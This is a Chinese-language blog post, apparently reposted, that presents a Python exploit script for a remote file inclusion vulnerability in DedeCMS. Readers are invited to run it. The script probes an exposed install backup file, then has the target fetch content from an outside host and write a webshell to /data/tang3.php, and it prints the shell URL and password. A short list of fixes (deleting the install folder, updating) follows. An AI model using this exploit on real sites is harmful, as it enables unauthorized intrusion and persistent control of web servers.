織夢CMS漏洞，就好比女人的大姨媽，每個月不來上一次，這就算是內分泌失調。代碼是用python寫的，小伙伴們自行調試吧！在前段時間，織夢爆出了一個遠程文件包含漏洞。呃，感謝hoseph同學提供的代碼吧。寫的很不錯！修復此漏洞方法，請見文章底部。

#! /usr/bin/env python

#coding=utf-8

#Joseph(小續)

import requests

import sys

import re

def main():

try:

url="http://"+sys.argv[1].strip('http://')

except IndexError:

print '''

poc: dede.py [url]http://www.baidu.com/[/url]

'''

payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"

urlpoc=url+payload

code=requests.get(urlpoc).status_code

if code==200:

print u"恭喜存在此漏洞"

print u"Ongoing attacks--->>>>>"

exploit(url)

pass

else:

print u"sorry 漏洞正在掙扎"

pass

def exploit(url):

urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"

htmlcontent=requests.get(urlpoc).content

Probe=re.compile(r'存在')

if Probe.findall(htmlcontent):

print u'''

ver:getshell成功

shell:url+/data/tang3.php?a=0 ?密碼為：c

'''

pass

else:

print u"請看遠程地址是否已經不可用"

pass

if __name__ == '__main__':

main()

修復方法：

1、建議安裝完成后，刪除(改名)install文件夾。

2、給data文件夾改名，或者移動位置。

3、到織夢后臺，升級到最新的版本

4、官方網站下載最新補丁包手動更新到最新版本。

5、不用謝！

總結

以上是生活随笔為你收集整理的python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本（python）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。